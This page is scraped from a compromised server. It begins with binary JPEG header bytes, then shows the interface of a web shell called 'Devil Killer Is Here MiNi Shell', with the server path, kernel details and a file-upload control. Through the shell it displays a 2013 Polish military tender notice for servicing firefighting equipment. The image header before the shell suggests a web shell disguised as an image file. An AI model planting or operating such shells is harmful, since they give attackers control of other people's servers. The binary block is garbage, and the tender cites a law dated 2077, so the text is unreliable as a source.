JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130307/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130307/92572-N-2013.html

<p class="kh_header"><b>Grudziądz: USŁUGA PRZEGLĄDÓW SPRZĘTU POŻARNICZEGO</b><br>
<b>Numer ogłoszenia: 92572 - 2013; data zamieszczenia: 07.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 13 Wojskowy Oddział Gospodarczy (Jednostka Wojskowa 4503 ) , ul. Czwartaków 1, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 56 458 32 90, 458 32 00, faks 56 458 32 22.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.13wog.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa sektora finansów publicznych - jednostka wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGA PRZEGLĄDÓW SPRZĘTU POŻARNICZEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług w zakresie przeglądów okresowych sprzętu pożarniczego (narzędzia hydrauliczne, pompy, kompresory, agregaty i inne), zgodnie 
z wymaganiami określonymi w Rozdziale III SIWZ oraz warunkami wyszczególnionymi 
w Załączniku Nr 2 do SIWZ i ilościach określonych w Załączniku nr 1 do SIWZ, według zadań następująco:
1)	ZADANIE NR 1: Przegląd okresowy narzędzi hydraulicznych Holmatro - DPU 60P, 2060 PU Core, DPU 61 P20;
2)	ZADANIE NR 2: Przegląd okresowy pompy Lukas GO-3T i narzędzi hydraulicznych;
3)	ZADANIE NR 3: Przegląd okresowy kompresorów elektrycznych do ładowania butli aparatów powietrznych COLTRI MCH-6 ETC;
4)	ZADANIE NR 4: Przegląd okresowy kompresora elektrycznego do ładowania butli aparatów powietrznych - MSA 100 EFI;
5)	ZADANIE NR 5:  Przegląd  okresowy  kompresora elektrycznego do ładowania butli aparatów powietrznych Bauer Posejdon PE 3000 - TE
6)	ZADANIE NR 6:  Przegląd  okresowy  aparatów powietrznych nadciś.: FENZY AERIS, masek aparatów oraz butli kompozytowych oraz FENZY SPERIAN , masek aparatów oraz butli kompozytowych
7)	ZADANIE NR 7:  Przegląd  okresowy:  pił spalinowych MS-290 STIHL oraz przecinarek spalinowych do stali i betonu TS-400, TS-360, TS-760
8)	ZADANIE NR 8:   Przegląd  okresowy :motopomp pożarniczych, pomp pływających, pompy szlamowej oraz autopompy i układu wodno pianowego w samochodach pożarniczych 
9)	ZADANIE NR 9:   Przegląd okresowy agregatów prądotwórczych GX 200 HONDA, ED -2400  GX 160 HONDA, FOGO FH5540, silnik Honda GX270
10)	ZADANIE NR 10: Przegląd okresowy agregatów prądotwórczych FOGO FV 5540X - silnik Briggs Stratton 9HP
11)	ZADANIE NR 11: Przegląd okresowy reduktorów do butli tlenowych z zestawu ratunkowego PSP R-1
12)	ZADANIE NR 12: Przegląd okresowy oraz kalibracja mierników gazów wybuchowych SCOTT 096-3264
13)	ZADANIE NR 13: Przegląd okresowy poduszek niskociśnieniowych Vetter
14)	ZADANIE NR 14: Przegląd okresowy poduszek wysokociśnieniowych Holmatro
Zakres wykonania usługi przeglądu serwisowego sprzętu określonego w Rozdziale III 
ust. 1 SIWZ dla zadań nr 1 do 14 należy wykonać co najmniej zgodnie z:
1)	Zakresem prac określonym odrębnie dla każdego z zadań wyszczególnionym w Rozdziale III 
ust. 3 SIWZ;
2)	Polskimi Normami ogólnie dostępnymi m.in. w Komitecie Normalizacyjnym;
3)	Instrukcjami obsługi lub eksploatacji danego urządzenia lub narzędzi oraz obowiązującej dokumentacji techniczno-ruchowej sprzętu;
4)	Obowiązującymi przepisami w zakresie wykonywanej usługi.
Wykonawca będzie zobowiązany do świadczenia usług stanowiących przedmiot zamówienia 
w cyklach jak określono w Rozdziale III ust. 3 SIWZ.
Realizacja usług odbywać się będzie  w miejscowości Grupa gm. Dragacz ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog).
Wykonawca realizując usługi na terenie CSLog zobowiązany jest do przestrzegania przepisów dotyczących ochrony środowiska, przepisów przeciwpożarowych i porządkowych obowiązujących na terenie CSLog.
Po zrealizowaniu usługi Wykonawca winien uprzątnąć miejsce, w którym wykonywał czynności związane z realizacją usługi oraz odebrać zużyte części i płyny eksploatacyjne i zabrudzone czyściwa (o ile wystąpią dla danego zadania).
Wykonawca udzieli gwarancji na wymienione elementy, materiały:
1)	Dla zadania nr: 1, 2, 7,8 ,9, 10,11 ,12,13,14   - na okres 12 miesięcy.
2)	Dla zadania nr: 3, 4,5,6  - na okres 6 miesięcy.
Okres ważności przeglądu w danym zadaniu będzie zgodny z wymaganiami producenta sprzętu i obowiązującymi w tym zakresie normami (data przeglądu zostanie odnotowana w książce serwisowej sprzętu).
Szczegółowy opis warunków realizacji przedmiotu zamówienia określa Załącznik Nr 2 do SIWZ stanowiący Ogólne Warunki Umowy. 
Zamawiający dopuszcza wizje lokalną przez Wykonawcę w celu oględzin sprzętu, samochodów po uprzednio złożonym wniosku w tej sprawie. Wizja jest możliwa w terminie nie później niż 2 dni przed datą otwarcia w godz. 7.00-13.00, osobą kontaktową w zakresie umożliwienia i dokonania wizji jest p. Dariusz Kucharski tel. 56/458 31 83. Z przeprowadzonej wizji lokalnej przedstawiciel Zamawiającego jak powyżej sporządza notatkę lub protokół.

CPV:50413200-5
Nr kategorii usług:1
Nr CPC:88620
Charakter usługi:	przedmiotem zamówienia są usługi o charakterze priorytetowym (Załącznik 
nr1Rozporządzenia Prezesa Rady Ministrów z dnia 28 stycznia 2010 r.  w sprawie wykazu usług o charakterze priorytetowym i niepriorytetowym- Dz.U.2010 Nr 12, poz. 68).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców składających ofertę wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 1 PZP;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 2 PZP;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 3 PZP;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 3 PZP;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 4 PZP;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>***W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 i ust. 2 pkt 5 ustawy, należy przedłożyć:1)	oświadczenie o braku podstaw do wykluczenia  z postępowania o udzielenie zamówienia publicznego w okolicznościach, o których mowa w art. 24 ust. 1 Ustawy (wzór oświadczenia stanowi Załącznik Nr 4 do SIWZ); 
2)	aktualnego odpisu z właściwego rejestru lub z centralnej ewidencji i informacji 
o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, 
w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 Ustawy wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 Ustawy;
3)	informacji o przynależności bądź nie przynależności do grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2077 r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331 
z późn. zm.) według wzoru określonego w Załączniku Nr 7  do SIWZ. W sytuacji gdy Wykonawca wskaże, że przynależy do jakiejkolwiek grupy kapitałowej zobowiązany jest przedłożyć wraz 
z ofertą listę podmiotów należących do tej samej grupy kapitałowej (art. 26 ust. 2d Ustawy PZP). **Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu określonego (Podstawa: § 2 ust 3  Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego  2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane; DZ.U. z 19.02.2013 r., poz. 231) w Rozdziale VII ust. 3 pkt 2 SIWZ - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.Dokument, o którym mowa w ust. 4, powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.Jeżeli w kraju miejscu zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym  mowa w ust. 4, zastępuje się go dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub przed notariuszem.
Wymaga się również załączenia wraz z ofertą załączników:
Nr 1 	- Formularz ofertowy;
Nr 3 	- Oświadczenie o spełnieniu warunków udziału;
Nr 4 	- Oświadczenie o braku podstaw do  wykluczenia z postępowania;
Nr 5	- Wykaz części zamówienia, które Wykonawca powierza do realizacji podwykonawcy;
Nr 6	- Informacja o Wykonawcy.
Nr 7     - Oświadczenie o przynależności / bądź nie przynależności do grupy kapitałowej</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ust. 1 ustawy przewiduje możliwość wprowadzenia zmian do treści zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, jeżeli konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Zamawiającego  w zakresie następującym:
1)	podwykonawcy uczestniczącego w realizacji umowy w wypadku kiedy Wykonawca określi go co do tożsamości w ofercie;
2)	miejsca realizacji usługi o ile wystąpią uzasadnione okoliczności po stronie Zamawiającego lub Wykonawcy, których nie można było przewidzieć przed podpisaniem umowy lub wymagają tego względy techniczne; 
Zmiany jak powyżej  (z wyjątkiem pkt. 2) wymagają zachowania formy pisemnej (aneks) oraz pisemnego wniosku jednej ze Stron o zmianę wraz z uzasadnieniem.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.13wog.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> z kasy JW 4503 ul. Czwartaków 1, 86-300 Grudziądz: 7 zł, na wniosek Wykonawcy - wysyłka: 14,15 zł lub bezpłatnie z www.13wog.pl..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.03.2013 godzina 07:30, miejsce: kancelaria JW 4503 ul.Czwartaków 1 86-300 Grudziądz (pom. 7 bud. 1) - osobiście lub przesyłka, wykonawca uwzględnia czas niezbędny na dostarczenie oferty bezpośrednio do kancelarii.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Kopertę należy opisać hasłem: USŁUGA PRZEGLĄDÓW SPRZĘTU POŻARNICZEGO - sprawa nr 12/2013
nie otwierać do dnia 15.03.2013 r. do godziny 08.00
Uwaga! Na kopercie umieścić należy w postaci pieczęci firmowej lub odręcznego napisu nazwę Wykonawcy i jego adres zgodnie z danymi rejestrowymi (ewidencyjnymi). Konsekwencje złożenia oferty niezgodnie z opisem (np. potraktowanie oferty jako zwykłej korespondencji i niedostarczenie jej na miejsce składania ofert w terminie jak w SIWZ) ponosi Wykonawca. Wykonawca dla zachowania terminu składania ofert winien uwzględnić czas niezbędny na wystawienie przez osobę pełniącą służbę w biurze przepustek, przepustki upoważniającej do wejścia do kancelarii zamawiającego oraz czas niezbędny na przejście do kancelarii i złożenie ofert.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przegląd okresowy narzędzi hydraulicznych Holmatro - DPU 60P, 2060 PU Core, DPU 61 P20;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przegląd okresowy narzędzi hydraulicznych Holmatro - DPU 60P, 2060 PU Core, DPU 61 P20.Wymagany minimalny zakres czynności:1)	wymiana filtrów powietrza
2)	wymiana świec  zapłonowych
3)	sprawdzenie układu rozruchu silnika
4)	sprawdzenie parametrów pracy silnika
5)	sprawdzenie szczelności zwijadeł
6)	sprawdzenie szczelności przyłączy kości zwijadeł
7)	sprawdzenie szczelności króćca zaworu
8)	sprawdzenie szczelności kości przyłącza
9)	sprawdzenie szczelności szybkozłącza pompy
10)	sprawdzenie szczelności szybkozłączy narzędzi
11)	sprawdzenie szczelności zaworu bezpieczeństwa
12)	sprawdzenie ciśnienia maksymalnego
13)	sprawdzenie sił nacisku i rozwarcia narzędzi
14)	wymiana oleju hydraulicznego
15)	wykonanie przeglądu przez autoryzowany serwis
wykonanie czynności raz w roku:wrzesień
Ilość zestawów ogółem -6
ZESTAW:	
Zestaw  Holmatro - DPU 60P-4 zestawy
Zestaw 2060 PU Core-1 zestaw
Zestaw DPU 61 P20-1 zestaw
Zamówienie publiczne będzie realizowane w terminie do 30.11.2013 z uwzględnieniem cykli wyszczególnionych dla danego zadania i sprzętu zgodnie z Rozdziałem III SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przegląd okresowy pompy Lukas GO-3T i narzędzi hydraulicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przegląd okresowy pompy Lukas GO-3T i narzędzi hydraulicznych. Wymagany minimalny zakres czynności: Nazwa czynności:1)	wymiana filtrów powietrza
2)	wymiana świec  zapłonowych
3)	sprawdzenie układu rozruchu silnika
4)	sprawdzenie parametrów pracy silnika
5)	sprawdzenie szczelności zwijadeł
6)	sprawdzenie szczelności przyłączy kości zwijadeł
7)	sprawdzenie szczelności króćca zaworu
8)	sprawdzenie szczelności kości przyłącza
9)	sprawdzenie szczelności szybkozłącza pompy
10)	sprawdzenie szczelności szybkozłączy narzędzi
11)	sprawdzenie szczelności zaworu bezpieczeństwa
12)	sprawdzenie ciśnienia maksymalnego
13)	sprawdzenie sił nacisku i rozwarcia narzędzi
14)	wymiana oleju hydraulicznego
15)	wykonanie przeglądu przez autoryzowany serwis
Wykonanie czynności raz: czerwiec
Ilość zestawów- 1
Zamówienie publiczne będzie realizowane w terminie do 30.11.2013 z uwzględnieniem cykli wyszczególnionych dla danego zadania i sprzętu zgodnie z Rozdziałem III SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przegląd okresowy kompresorów elektrycznych do ładowania butli aparatów powietrznych COLTRI MCH-6 ETC.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przegląd okresowy kompresorów elektrycznych do ładowania butli aparatów powietrznych COLTRI MCH-6 ETC. Wymagany minimalny zakres czynności:Nazwa czynności:1)	wymiana filtra oczyszczania powietrza
2)	wymiana filtra wstępnego powietrza
3)	wymiana oleju
4)	sprawdzenie działania zaworu bezpieczeństwa
5)	sprawdzenie czystości powietrza zgodnie z normą PN-EN 12021
6)	wykonanie przeglądu przez autoryzowany serwis
7)	dokonać przeglądu poprawności działania przyrządów pomiarowych
Dwie czynności w roku: maj, listopad
Ilość  - 2 szt.
Zamówienie publiczne będzie realizowane w terminie do 30.11.2013 z uwzględnieniem cykli wyszczególnionych dla danego zadania i sprzętu zgodnie z Rozdziałem III SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przegląd okresowy kompresora elektrycznego do ładowania butli aparatów powietrznych - MSA 100 EFI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przegląd okresowy kompresora elektrycznego do ładowania butli aparatów powietrznych - MSA 100 EFI. Wymagany minimalny zakres czynności: Nazwa czynności:
1)	wymiana filtra oczyszczania powietrza
2)	wymiana filtra wstępnego powietrza
3)	wymiana oleju
4)	sprawdzenie działania zaworu bezpieczeństwa
5)	sprawdzenie czystości powietrza zgodnie z normą PN-EN 12021
6)	wykonanie przeglądu przez autoryzowany serwis
7)	dokonanie przeglądu poprawności działania przeglądów pomiarowych
Dwie czynności w roku: maj, listopad
Ilość sztuk - 1
Zamówienie publiczne będzie realizowane w terminie do 30.11.2013 z uwzględnieniem cykli wyszczególnionych dla danego zadania i sprzętu zgodnie z Rozdziałem III SIWZ.</p></li>
